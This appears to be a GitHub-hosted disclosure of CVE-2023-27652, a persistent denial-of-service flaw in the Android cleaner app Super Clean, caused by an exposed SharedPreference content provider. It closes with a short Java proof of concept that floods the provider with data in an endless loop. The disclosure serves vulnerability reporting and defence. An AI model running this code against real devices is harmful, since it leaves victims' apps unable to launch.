Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Denial of Service exists in Super Clean(CVE-2023-27652)

Vendor:Ego Studio(http://www.egostudiogroup.com/)

Affected product:Super Clean(com.egostudio.clean)

Version:1.1.5 1.1.9

Download link:https://apkpure.com/cn/super-clean-phone-cleaner/com.egostudio.clean/download

Description of the vulnerability for use in the CVE:An issue found in Ego Studio SuperClean v.1.1.9 and v.1.1.5 allows an attacker to cause a denial of service via the SharedPreference files.

Additional information:Super Clean is a phone cleaner app for cleaning junk files and optimizing memory usage, it also provides various security-related features such as Wifi security check, app lock, etc. Upon opening the app, it loads the SharedPreference files into memory. If a malicious app injects a large amount of data into these files, the Super Clean app will load excessive data into memory, which can trigger an OOM error and cause the app to crash. Even worse, simply restarting the app will not fix the security issue, as the injected data is persistent in the SharedPreference files. In practice, this means that the Super Clean app becomes unable to launch successfully.

poc:

public void attack(){
    ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
    Uri uri = Uri.parse("content://com.egostudio.clean.boost.main.SharedPrefProvider");
    while (true) {
        ContentValues contentValues = new ContentValues();
        contentValues.put("file_name","__default__");
        contentValues.put("type",4);
        contentValues.put("key",randomString);
        contentValues.put("value",randomString);
        contentResolver.insert(uri,contentValues);
    }
}